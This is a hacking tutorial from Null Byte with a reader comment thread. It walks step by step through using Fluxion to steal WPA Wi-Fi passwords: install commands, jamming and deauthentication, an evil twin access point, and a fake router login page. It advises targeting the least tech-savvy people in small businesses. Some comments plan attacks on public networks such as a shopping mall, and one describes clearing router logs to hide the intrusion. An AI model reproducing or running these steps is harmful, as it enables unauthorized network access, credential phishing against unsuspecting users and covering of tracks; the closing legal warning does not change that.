How to Hack Wi-Fi: Capturing WPA Passwords by Targeting Users with a Fluxion Attack

Capturing WPA Passwords by Targeting Users with a Fluxion Attack

With tools such as Reaver becoming less viable options for pen-testers as ISPs replace vulnerable routers, there become fewer certainties about which tools will work against a particular target. If you don't have time to crack the WPA password or it's unusually strong, it can be hard to figure out your next step. Luckily, nearly all systems have one common vulnerability you can count on — users!

Social engineering goes beyond hardware and attacks the most vulnerable part of any system, and one tool that makes it super easy is Fluxion. Even the most antisocial hacker can hide behind a well-crafted login page, and Fluxion automates the process of creating a fake access point to capture WPA passwords.

Picking the Weakest Links to Attack

Users are almost always the weakest link of a system, and so attacks against them are often preferred because they are cheap and effective. Hardware concerns can often be ignored if the users are sufficiently inexperienced with technology to fall for a social engineering attack. While social engineering attacks may raise flags within more tech-savvy organizations, phishing and spoofing attacks against users are the tool of first choice for both nation states and criminal hackers.

One of the most vulnerable targets to this kind of attack is a small- or medium-sized business focused on an industry other than technology. These businesses usually have many vulnerable or unpatched systems with default credentials that are easy to exploit over their wireless network and are not likely to know what an attack looks like.

How Fluxion Works Its Magic

Fluxion is the future — a blend of technical and social engineering automation that tricks a user into handing over the Wi-Fi password in a matter of keystrokes. Specifically, it's a social engineering framework using an evil twin access point (AP), integrated jamming, and handshake capture functions to ignore hardware and focus on the "wetware." Tools such as Wifiphisher execute similar attacks but cannot verify the WPA passwords supplied.

Image by Kody/Null Byte

Fluxion evolved from an advanced social engineering attack named Lindset, where the first tool was written mostly in Spanish and suffered from several bugs. Fluxion is a rewritten attack to trick inexperienced users into divulging the password/passphrase of the network.

Fluxion is a unique tool in its use of a WPA handshake to not only control the behavior of the login page but the behavior of the entire script. It jams the original network and creates a clone with the same name, enticing the disconnected user to join. It presents a fake login page indicating the router needs to restart or load firmware and requests the network password to proceed. Simple as that.

The tool uses a captured handshake to check the password entered and continues to jam the target AP until the correct password is entered. Fluxion uses Aircrack-ng to verify the results live as they are entered, and a successful outcome means the password is ours.

Checking WPA password capture confirming through Aircrack-ng. Image by Kody/Null Byte

Tactically, the attack is only as good as the fake login screen. Many have been added to Fluxion since it was created, and it's possible to develop other screens with some research. In general, running the attack with default login screens will immediately call attention from a more experienced user or tech-savvy organization. The attack is most effective when targeted at whoever is the oldest or least tech-savvy in an organization. Sensitive APs with intrusion detection systems may detect and attempt to defend against the attack by blocking your IP in response to the integrated jamming.

System Compatibility & Requirements

Fluxion works on Kali Linux. Just make sure that you are fully updated or that you're running Kali Rolling to ensure the system and dependencies are current. You may run it on your dedicated Kali install in a virtual machine. If you're looking for a cheap, handy platform to get started on, check out our Kali Linux Raspberry Pi build using the Raspberry Pi 3 or Raspberry Pi 4. The tool will not work over SSH since it relies on opening other windows.

For it to work, we'll need to use a compatible wireless network adapter. Check out our list of Kali Linux compatible wireless network adapters or just grab our most popular adapter for beginners. Make sure that your wireless adapter capable of monitor mode is plugged in and recognized by Kali and seen when iwconfig or ifconfig is entered.

How to Capture WPA Passwords with Fluxion

Our goal in this article will be to target an organization via its WPA encrypted Wi-Fi connection. We will launch an attack against users attached to the access point "Probe," capture a handshake, set up a cloned (evil twin) AP, jam the target AP, set up a fake login page, and confirm the captured password against the handshake.

Step 1: Install Fluxion

The developer of Fluxion shut down the product recently, but you can get an older version of it to use still. To get the older version of Fluxion running on your Kali Linux system, clone the Git repository with:

~# git clone https://github.com/wi-fi-analyzer/fluxion

Cloning into 'fluxion'...
remote: Enumerating objects: 2646, done.
remote: Total 2646 (delta 0), reused 0 (delta 0), pack-reused 2646
Receiving objects: 100% (2646/2646), 26.14 MiB | 83.00 KiB/s, done.
Resolving deltas: 100% (1433/1433), done.

Check for missing dependencies by navigating to the folder, then list the contents to see what's in it.

~# cd fluxion
~/fluxion# ls

docs        install   lib     logos      siteinstaller.py
fluxion.sh  language  locale  README.md  sites

Next, start it up for the first time with ./fluxion.sh (if not root, use sudo ./fluxion.sh). You'll likely see the following, where some dependencies will be needed.

~/fluxion# ./fluxion.sh

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

aircrack-ng.....OK!
aireplay-ng.....OK!
airmon-ng.......OK!
airodump-ng.....OK!
awk.............OK!
curl............OK!
dhcpd...........Not installed (isc-dhcp-server)
hostapd.........OK!
iwconfig........OK!
lighttpd........Not installed
macchanger......OK!
mdk3............OK!
nmap............OK!
php-cgi.........Not installed
pyrit...........OK!
python..........OK!
unzip...........OK!
xterm...........OK!
openssl.........OK!
rfkill..........OK!
strings.........OK!
fuser...........OK!

To fetch dependencies needed and set your board to green, install the missing ones from the list. In my case, it's dhcpd, lighttpd, and php-cgi.

~/fluxion# apt install dhcpd lighttpd php-cgi

For dhcpd, if it installs udhcpd instead, run the following command to get the right one.

~/fluxion# apt install isc-dhcp-server

After all the dependencies are met, the board is green, and you can proceed to the attack interface. Run the Fluxion command again with ./fluxion.sh (or sudo ./fluxion.sh) to get hacking.

~/fluxion# ./fluxion.sh

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[2] Select your language

      [1] English
      [2] German
      [3] Romanian
      [4] Turkish
      [5] Spanish
      [6] Chinese
      [7] Italian
      [8] Czech
      [9] Greek
      [10] French
      [11] Slovenian

[deltaxflux@fluxion]-[~] 1

Step 2: Scan Wi-Fi Hotspots

The first option is to select the language. Do so by typing the number next to the one you want and press Enter to proceed to the interface selector. Here, you'll see all of your connected network interfaces. Choose the number next to the one that you want, in my case, 1 for wlan2.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

Select an interface
      [1] wlan2         Atheros AR9271  ath9k
      [2] wlan1         Ralink RT2870/3070      rt2800usb
      [3] wlan0         Atheros AR9565  ath9k

[deltaxflux@fluxion]-[~] 1

That will take you to the target identification stage. If the channel of the network you wish to attack is known, you may enter 2 to narrow the scan to the desired channel. Otherwise, select 1 to scan all channels.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[i] Select channel

      [1] All channels
      [2] Specific channel(s)
      [3] Back

[deltaxflux@fluxion]-[~] 1

A WiFi Monitor window will open while it occurs, so allow the scan to collect wireless data for at least 30 seconds. It's essential to let the attack run for at least 30 seconds to verify if a client is connected to the network. Press Control-C or click the window's (x) to stop the capture process whenever you spot the wireless network that you want. After you do so, the window will close and the results will appear back in the terminal.

Step 3: Choose Your Target AP

Select a target with active clients for the attack to run on by entering the number next to it. Unless you intend to wait for a client to connect (possibly for a long time), the attack will not work on a network without any clients. Without anyone connected to the network, who would we trick into giving us the password?

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

                        WIFI LIST

ID      MAC                     CHAN    SECU        PWR     ESSID
[1]     BC:F6:85:04:A9:98       9       WPA2        26%     ACR North
[2]     14:AB:F0:CC:6E:90       4       WPA2        30%     cpc-office
[3]     B4:75:0E:B4:54:DO       1       WPA2        34%     JadeMagnolia
[4]*    E8:AD:A6:55:31:9E       11      WPA         34%
[5]     E8:ED:05:7A:4D:70       6       WPA2        36%     DG1670A72
[6]     A4:2B:BO:E9:5B:6D       1       WPA2        34%     MEDICO
[7]     28:9E:FC:62:7A:E6       1       WPA2        37%     MySpectrumWiFie0-2G
[8]     84:A0:6E:C6:93:CE       1       WPA2        37%     MyspectrumWiFic8-2G
[9]     9C:A3:A9:62:7C:E4       14      WPA2        36%     NVR9ca3a9627ce4
[10]    AC:5D:10:4A:95:2A       11      WPA2        36%     ATT304
[11]    8C:A2:FD:00:18:A5       6       WPA2        36%     HungryCandy
[12]    BO:98:2B:4E:62:AE       1       WPA2        36%     MySpectrumWiFia8-2G
[13]    A4:08:F5:70:79:8A       1       WPA2        36%     MySpectrumWiFi84-2G
[14]    A0:39:EE:7E:63:DA       1       WPA2        36%     MINDEOK-2G
[15]    24:79:2A:93:50:38       7       WPA2        34%     TWCWiFi-Passpoint
[16]    24:79:2A:13:50:39       7       WPA2        34%     SpectrumWiFi Plus
[17]    8C:A2:FD:00:05:8E       6       WPA2        37%     LavishBest
[18]    AC:EC:80:09:65:CO       1       WPA2        37%     SHIN
[19]    00:AC:E0:91:65:80       1       WPA2        39%     SMQ 2.4
[20]    1A:91:82:8E:DF:FB       4       WPA2        38%
[21]    B2:52:16:21:47:E9       4       WPA2        38%     DIRECT-6SMFC-L5700DW_BR47e9
[22]    10:05:31:32:BB:30       11      WPA2        39%     GoGo Foot
[23]    EC:0E:C4:73:09:A7       1       WPA2        38%     WIFI73C9A4
[24]    20:E5:2A:4D:A6:F2       1       WPA2        38%     Netgear 100-2G
[25]    98:6B:3D:DF:64:50       6       WPA2        40%     Undefined
[26]    8C:A2:FD:00:9C:AD       6       WPA2        39%     Wittyslim
[27]    F4:6B:EF:30:0F:OE       1       WPA2        40%     PT STOP
[28]    38:3B:C8:02:59:66       4       WPA2        38%     ATT386
[29]    8C:A2:FD:01:23:28       6       WPA2        40%     Donna :)
[30]    FE:EC:DA:A4:06:40       6       WPA2        40%
[31]    84:A0:6E:C2:0A:2E       1       WPA2        41%     MyspectrumWiFi28-2G
[32]    98:6B:3D:CA:45:70       9       WPA2        42%     DG1670A72
[33]    14:91:82:8E:DF:FB       4       WPA2        40%     FBISurveillanceTruck
[34]    AC:E2:03:10:75:8A       5       WPA2        42%     DIRECT-89-HP Officejet Pro 6970
[35]    OE:A2:FD:01:2B:28       6       WPA2        41%     Donna :) _Guest
[36]    34:6B:46:40:5A:5A       6       WPA2        42%     MySpectrumWiFi54-2G
[37]    50:33:8B:68:2D:74       1       WPA2        41%
[38]    1C:B9:04:6B:6D:53       3       WPA2        42%     island-2B6D50
[39]    8C:A2:FD:00:63:41       6       WPA2        43%     Stevefi
[40]    F4:6B:EF:1E:AA:C6       1       WPA2        43%     Happy777-2G
[41]    1C:BO:44:CD:34:FO       5       WPA2        44%     MySpectrumWiFif2-2G
[42]    AC:EC:80:A8:F6:FO       6       WPA2        44%     TG1672GF2
[43]*   88:DC:96:55:72:00       1       WPA2        47%     anchor
[44]    BO:6E:BF:DB:C1:B8       1       WPA2        45%     claire
[45]    90:1A:CA:6C:07:00       1       WPA2        47%     piccadilly
[46]*   40:20:09:2A:64.90       11      WPA2        46%     spot 2.4 ghz
[47]    60:19:71:EE:A9:20       11      WPA2        45%     seoultaxservice
[48]    OC:EA:C9:77:83:00       11      WPA         46%
[49]    DO:17:02:B2:06:08       8       WPA2        48%     ATI-Guest
[50]    60:38:E0:89:F5:02       3       WPA2        47%     thlee174
[51]    8C:FE:74:79:E3:73       9       WPA2        46%     island-39E370
[52]    40:70:09:74:48:BO       6       WPA2        47%     Envy
[53]    28:9E:FC:62:5B:26       1       WPA2        48%     MySpectrumWiFi20-2G
[54]    94:91:7F:25:41:B1       5       WPA2        58%     SSooniestyle
[55]    C4:01:7C:13:10:09       11      WPA2        60%     TWCWiFi-Passpoint
[56]    CC:20:21:38:33:11       10      WPA2        36%     DT TUTORING
[57]    AC:B3:13:07:42:70       11      WPA2        28%     Vog Hair Salon-1
[58]    28:9E:FC:67:61:06       11      WPA2        40%     MySpectrumWiF100-2G
[59]    DC:EF:09:CD:30:37       11      WPA2        36%     fobdawg_EXT
[60]    AC:B3:13:7A:4A:90       11      WPA2        38%     Gryffindor
[61]    C4:01:7C:53:10:08       11      WPA2        58%     SpectrumWiFi Plus
[62]    8C:A2:FD:01:34:46       6       WPA2        35%     Chiefrutabaga
[63]    8C:A2:FD:00:41:B3       6       WPA2        35%     NNND_NET
[64]    CO:C1:CO:B6:F3:71       6       WPA2        39%     SilverHorse
[65]    24:F5:A2:2D:F8:09       6       WPA2        36%     LALASHOP2.4
[66]    60:72:20:3D:B6:50       6       WPA2        39%     MBC NEW MEDIA ROOM
[67]    08:02:8E:BB:18:1B       -1      WPA2        99%

(*) Active clients

        Select target. For rescan type r
[deltaxflux@fluxion]-[~] 46

Step 4: Select Your Attack

Once you've typed the number of the target network, in my case, 46, press Enter to load the network profile into the attack selector. For demonstration purposes, I'll use option 1 to make a "FakeAP" using Hostapd. It will create a fake hotspot using the captured information to clone the target access point.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

INFO WIFI

                SSID = spot 2.4 ghz / WPA2
                Channel = 11
                Speed = 95 Mbps
                BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )

[2] Select Attack Option

        [1] FakeAP - Hostapd (Recommended)
        [2] FakeAP - airbase-ng (Slower connection)
        [3] Bruteforce - (Handshake is required)
        [4] Back

[deltaxflux@fluxion]-[~] 1

Step 5: Get a Handshake

To verify that the password you receive works, you can check it against a captured handshake. If you have a handshake, you can enter it on the next screen. If not, we can press Enter to force the network to provide a handshake in the next step.

handshake location   (Example: /root/fluxion.cap)
Press ENTER to skip

Path:

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[2] Handshake check

        [1] pyrit
        [2] aircrack-ng (Miss chance)
        [3] Back

[deltaxflux@fluxion]-[~] 2

The screen to check that handshake will appear as seen above. Using the Aircrack-ng method by selecting option 2, Fluxion will send deauthentication packets to the target AP as the client and listen in on the resulting WPA handshake. But first, you need to choose who to deauth, which I'd recommend option 3 so you only deauth the target and not everyone.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[2] *Capture handshake*

        [1] Deauth all
        [2] Deauth all [mdk3]
        [3] Deauth target
        [4] Rescan networks
        [5] Exit

[deltaxflux@fluxion]-[~] 3

Two windows will pop up, one for Capturing data on channel and one for Deauthenticating client. In the first window, at the top, look out for the "WPA handshake" to appear. When you see it, as it does in the top right of the screenshot below, you have captured the handshake.

Close both of those windows. Back in the terminal, type 1 for "Check handshake," and hit Enter to load the handshake into your attack configuration.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[2] *Capture handshake*

Status handshake:

        [1] Check handshake
        [2] Back
        [3] Select another network
        [4] Exit
        #> 1

Now, create an SSL certificate, option 1, so you can create a pop-up without causing alarm and preventing the browser from navigating to it.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

  Certification invalid or not present, please choice

        [1] Create a SSL certificate
        [2] Search for SSl certificate
        [3] Exit

        #> 1

Step 6: Create the Fake Login Page

Now it's time to create the fake login page. Select option 1 for "Web Interface" to use the social engineering tool.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

INFO WIFI

                SSID = spot 2.4 ghz / WPA2
                Channel = 11
                Speed = 95 Mbps
                BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )

[2] Select your option

        [1] Web interface
        [2] Bruteforce
        [3] Exit

#? 1

You will be presented with a menu of different fake login pages you can offer to the user. These are customizable with some work but should match the device and language. The defaults should be tested before use, as some are not very convincing. I chose an English language Netgear attack, option 27.

Now for the final step to arm the attack. At this point, you are ready to fire, so press Enter after selecting your language option to launch the attack.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

INFO WIFI

                SSID = spot 2.4 ghz / WPA2
                Channel = 11
                Speed = 95 Mbps
                BSSID = 40:70:09:7A:64:90 (ARRIS Group, Inc. )

[2] Select Login Page

        [1]  English        [ENG]   (NEUTRA)
        [2]  German         [GER]   (NEUTRA)
        [3]  Russian        [RUS]   (NEUTRA)
        [4]  Italian        [IT]    (NEUTRA)
        [5]  Spanish        [ESP]   (NEUTRA)
        [6]  Portuguese     [POR]   (NEUTRA)
        [7]  Chinese        [CN]    (NEUTRA)
        [8]  French         [FR]    (NEUTRA)
        [9]  Turkish        [TR]    (NEUTRA)
        [10] Romanian       [RO]    (NEUTRA)
        [11] Hungarian      [HU]    (NEUTRA)
        [12] Arabic         [ARA]   (NEUTRA)
        [13] Greek          [GR]    (NEUTRA)
        [14] Czech          [CZ]    (NEUTRA)
        [15] Norwegian      [NO]    (NEUTRA)
        [16] Bulgarian      [BG]    (NEUTRA)
        [17] Serbian        [SRB]   (NEUTRA)
        [18] Polish         [PL]    (NEUTRA)
        [19] Indonesian     [ID]    (NEUTRA)
        [20] Dutch          [NL]
        [21] Danish         [DAN]
        [22] Hebrew         [HE]
        [23] Thai           [TH]
        [24] Portuguese     [BR]
        [25] Slovenian      [SVN]
        [26] Belkin         [ENG]
        [27] Netgear        [ENG]
        [28] Huawei         [ENG]
        [29] Verizon        [ENG]
        [30] Netgear        [ESP]
        [31] Arris          [ESP]
        [32] Vodafone       [ESP]
        [33] TP-Link        [ENG]
        [34] Ziggo          [NL]
        [35] KPN            [NL]
        [36] Zigoo2016      [NL]
        [37] FRITZBOX_DE    [DE]
        [38] FRITZBOX_ENG   [ENG]
        [39] GENEXIS_DE     [DE]
        [40] Login-Netgear  [Login-Netgear]
        [41] Login-Xfinity  [Login-Xfinity]
        [42] Telekom
        [43] Google
        [44] MOVISTAR       [ESP]
        [45] Back

#? 27

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[i] Attack in Progress ..
        [1] Choose another network
        [2] Exit

        #>

The attack spawns multiple windows to create a cloned version of their wireless network while simultaneously jamming the common access point, enticing the user to join the identically named, but unencrypted, network.

Step 7: Capture the Password

The user is directed to a fake login page, which is either convincing or not, depending on which you chose.

Perhaps not the most elegant deception, but these files are configurable.

Entering the wrong password will fail the handshake verification, and the user is prompted to try again. Upon entering the correct password, Aircrack-ng verifies and saves the password to a text file while displaying it on the screen. The user is directed to a "thank you" screen as the jamming ceases and the fake access point shuts down.

[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
[                                                      ]
[      FLUXION 2    < Fluxion Is The Future >          ]
[                                                      ]
[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]

[-] Cleaning and closing
[-] Disabling monitoring interface mon0
[-] Disabling interface wlan1
[-] Disabling forwarding of packets
[-] Cleaning iptables
[-] Restoring tput
[-] Delete files
[-] Restarting Network-Manager
[-] Cleanup performed successfully!
[+] Thanks for using fluxion

You can verify your success by checking the readout of the Aircrack-ng WiFi Information screen.

Congratulations, you've succeeded in obtaining and verifying a password, supplied by targeting the "wetware." You've tricked a user into entering the password rather than relying on a preexisting flaw with the security.

Warning: This Technique Could Be Illegal Without Permission

Legally, Fluxion combines scanning, cloning, creating a fake AP, creating a phishing login screen, and using the Aircrack-ng script to obtain and crack WPA handshakes. As such, it leaves signatures in router logs consistent with using these techniques. Most of these practices are illegal and unwelcome on any system you don't have permission to audit.

Just updated your iPhone to iOS 18? You'll find a ton of hot new features for some of your most-used Apple apps. Dive in and see for yourself:

Cover photo and screenshots by Kody/Null Byte

90 Comments

+1 very descriptive.

When i broadcast the fake ap there no password protection on in (assuming we're checking on our smartphone) . Am I doing something wrong here. Help is appreciated thank you

No, this is correct. The fake AP does not have a password. If you were to put a password on it, it would need to match the one they are already using in order for them to connect to it. Since we don't know the password yet (that's what we're trying for) the fake AP appears the same, but has no encryption.

Thank you for clarifying it. I had fault impression that the fakeAP would create exact copy of the existence one and not prompting the victim go through Web browser instead to enter the password.

My bad, I'll be more clear!

Thanks for the excellent tutorial!
Can you shed some light on how to edit or perhaps make custom web interfaces?

It can be done, but DeltaFlux has been less than forthcoming about how. This spanish-language video was the first example I saw of modifying a page. Sorry for the rude spanish lemon.

No speak Spanish! LOL I can develop web pages np, just need to know what additional code to add, where the pages are kept, etc. =)

This is not spanish, this is PORTUGUESE! This is from my country: Brazil. If anyone are interested in, I can explain it in english. It's a very simple process to create a fake page.

Every thing is working fine but it's not creating a fake ap what should I do I tried multiple times even though deauthenticate is working there is no fake ap to connect is there a problem in my WiFi adaptor it supports monitor mode what should I do help me

Hello, does this attack work if the person performing the attack is offline. Thanks.

Hi Harry,

No, both the attacker and the target must be online for this attack to work. Thus, you must target a network with a client connected.

i cant download fluxion plz can u tell where to find it?or do u have any direct link to downloadable file?
download page ask for "username & password" huh
pllzzz help

try: sudo apt-get install fluxion

So an attack like this is tracable?
And if so tracable back to a terminal or something other than that?
Thank you,in advance.

Hello,
great article, however I have some problems.

When I get the handshake it says my certificate is invalid or not present and then goes on to do the same thing however it does not show the one using the network any of the login screens therefore not making it able for me to get the password at all.

Any help would be appreciated :)

Hi. Did you fix it? Same problem here

Hello everyone,

I found the following explanation from the creator of fluxion.

For now, refer to this fluxion repo. It's a slightly older version, but I'm hearing reports that it works.

When im sudo ./installer.sh it remove anything.then my laptop got freeze.what should i do?

Acer Aspire F15 (F5-573G-59V4) ( Intel Core i5 / 7th Gen / 4 GB RAM / 1 TB HDD / 2 GB Nvidia Dedicated graphics

getting error:

wc: /tmp/TMPflux/dump-01.csv: No such file or directory
./fluxion: line 1218: : -le: unary operator expected
cat: /tmp/TMPflux/dump-01.csv: No such file or directory
expr: syntax error
WIFI LIST

ID MAC CHAN SECU PWR ESSID

grep: invalid: No such file or directory
grep: number: No such file or directory
grep: of: No such file or directory
grep: lines:: No such file or directory
grep: '/tmp/TMPflux/dump-01.csv': No such file or directory
1) head: invalid number of lines: '/tmp/TMPflux/dump-01.csv' 100%

(*)Active clients

Select target. For rescan type r
#>

You're running fully updated kali rolling?

hi there iam new around here :) i was wondering if someone could help me after typing first command, git clone hhtps://github.com/deltaxflux/fluxion.git, it then puts me on the next part which is (cloning into 'fluxion'...) it then asks for a user name/password. which i thought would be user: root/password: toor, which is root backwards anyways user works fine but password then says , fatal: Authentication failed for 'github.com/deltaxflux/fluxion.git/' any hep on this matter would be very much appreciated :) also im running kali via live USB persistence.

My DHCP server will not start a fake AP. Everytime I try it will either freeze at server service starting or it will send a few requests and packs and nothing will happen. It won't show clients online and I make sure there is plenty to test. I am pretty sure I do everything write. Is there something else I can do to improve this?

When selecting the interface to use (using an ALFA 2w usb wireless device) I get a complete hardware lock up requiring a reset of the VM.

Can anyone advise how to debug this issue? Can I get it to spit out information to the terminal so I can see which step it is occuring at? I might try putting some more comments in the script

So after selecting my language, I pressed 1 to scan all surrounding networks and I was given this error message:
head: invalid number of lines: '/tmp/TMPflux/dump-01.csv'

I looked online and for everyone having an issue with Fluxion at that point, they get an error that says "TMPlinset" instead of "TMPflux" so I don't really know what to do here.... and my internet works fine and I haven't had an issue with any other programs so this is a first.

linset is what fluxion used to be called. if you can find a solution to their errors where it says TMPlinset I can almost guarantee the same solution will work for you

It actually worked! I tried it on my wifi network having two apple devices connected, it all worked out: the fake AP was created, the handshake was captured with aircrack-ng and having selected the Huawei web interface, upon connecting I was greeted with a captive.apple.com screen asking for my key. I put it in and it was transmitted to my hacking laptop and voila: key found! Now wondering where I can test this out, probably a shopping mall in my city. Great and helpful article! Thanks!

Happy it worked!

I found out about Lindset when it was used on a business I was working for, it's a pretty awesome tool and I'm happy it's been evolving

hello guys i know it is out the subject,but can someone teach us about SS7 attack & how to do it ?

Does it need two wireless cards, like wifiphisher?

sorry. its working. i passed all the installer. but there's no language option showing. after i type sudo ./fluxion, nothing happen

Hello,i see you have bruteforce option but here it doesn't show up,how i can use bruteforce method?

Hi ,I have had a problem installing these unmet dependencies and packages while installing fluxion,now after manually installing those i have damaged my default ubuntu which is 14.04 LTS,now i want to get back my ubuntu in its original form so please suggest how to uninstall fluxion and other packages that i tried to install along with it.Please now i am not able to install any tool or software due to this so please provide a solution.

Really descriptive.
Thanks

I got an ideea for a project, If u have a PC and it's locked, u can make up a simple device to crack any password u can put in a wordlist, u only need a raspberry pi and a way to make it input the passwords in any place, (ex: fb pass box, admin box ANY BOX THAT NEEDS A PASS) but u need to unplug the keyboard and connect the raspberry pi instead. Then find a way to make the pi repeat some simple comands, select pass length , input, and click Back If the pass is incorrect to start over. And add more than one type of cables ex: for bypassing anything in your way, like security doors, PC, phones...... Now I got u guys thinking ... :) :)

Nice guide!
Also for anyone wondering,
Tried it with Net-hunter, many issues: (Rev 6)
1) After running ./fluxion
Error: Need a graphical session (X)
Fix: Use VNC

2) After installation(s) and then running ./fluxion
Error: line 615: /lib/airmon/airmon
Fix: Create a directory /root/fluxion/lib/airmon/ and move airmon.sh into it

3) After installation(s) and then running ./fluxion
Error: line %random%: /dev/fd/62
Fix: Delete fd folder in root/fluxion/dev/ and copy link from /dev/fd paste into /root/fluxion/dev/

4) Cant see any labels of choices
Temp Solu: It will still work, refer the images in the guide while selecting options

5) After choosing the router login webpage

Error: Directory not found (example) /root/fluxion/sites/netgear_eng/ and 403-Forbidden-ed instead of login page on victim's side.

Fix: Rename the "Sites" to "site" and the following lowercase and underscore ("NETGEAR-ENG" to "netgear_eng")

Damn, way to power through! Thank you

Hi

I follow the guide all through but it freezes after opening four new windows, the one with green text says starting the service but never advances, please help.I am using Ralink external wireless adapter with monitor mode enabled.Could it be possibly because my adapter is unable to create a hotspot? Please advice

Thanks in advance

Hey I Used Deltaflux Version Of Fluxion It Work Great Now I Want to Know That I Have seen So many Video Tutorial Every1 Sign In to Network From Their phone .....could this attack be done on a Laptop WiFi User ....Please send Me A Private Message Or Here Thanks In Advance

Fluxion on Raspberry Pi.

I have install Fluxion on raspberry pi3 with kali linux, and i am controlling my pi with vino-vnc, i have created a hotspot on wlan0 and i have attached an external wifi card i.e, wlan1, for security auditing of my wifi network, after getting handshake, when i going to launch web interface, it reset my both Cards parameters and i lost connection of my vnc?

Is it possible that program only reset my wlan1 interface not wlan0??

What is the difference between these??
Capture Handshake
1) Deauth all
2) Deauth all {mdk3}
3) Deauth target

And normally, how long does it take to capture handshake??
Thanks

as soon as someone connects to your evil twin you get the handshake.

All - kill everything.
Mdk3 is just a version of a DOS tool to kill all
Target- just kill one machine

Please help me. When I reach the point where I have to select an attack option I only se two options. The one that is missing is the brute force attack. I've installed fluxion from the official repo in GitHub and nothing. I've uninstalled and reinstalled it again and it didn't worked. Please help me.

Hello, Ive done it successfully on my wifi.
you mentioned leaving signatures in the routers log.
which steps create the signatures?
is there any way to delete the signatures?

yes when you connect the Internet find his router ip : you can find on windows CMD ipconfig ; or in Kali click on network edit you can find there .

copy router ip and past on browser url login the admin panel
check if admin username and password work if not work then u cant
after login you find logs click on it and cleared

can this wifi-hack work on a virtual machine running kali linux?

I don't think that a virtual machine can recognize a connected wireless adapter

What wifi adapter are you using?

In your VM is the network set to bridged? If not unplug the adapater. Bridge the network with your own. Put your adapter back in (male sure you have installed the drivers for it). Then open a terminal and type ifconfig...it should now appear. If not post a picture of your terminal output.

I've encountered a problem. Everything works up to the point that i connect to the FakeAP. When i open up a browser en type a random adress, i dont get send to the ''router inlog page''. e.a. when i put in google.com it just tries to load it and says that google.com can't be reached.

What am i doing wrong here? Thanks!

Are you trying to access the fake AP on a computer or a mobile device?

I tested in my own tplink router with a Dell laptop with inbuilt network adaptor. Every lines of command worked fine but in the end when i started deauthniciate, my mobile disconnected from my original AP. After that it tried to re-connect to the same AP(may be fake AP) and asked me to enter WiFi password. When I entered the wifi password nothing happened.

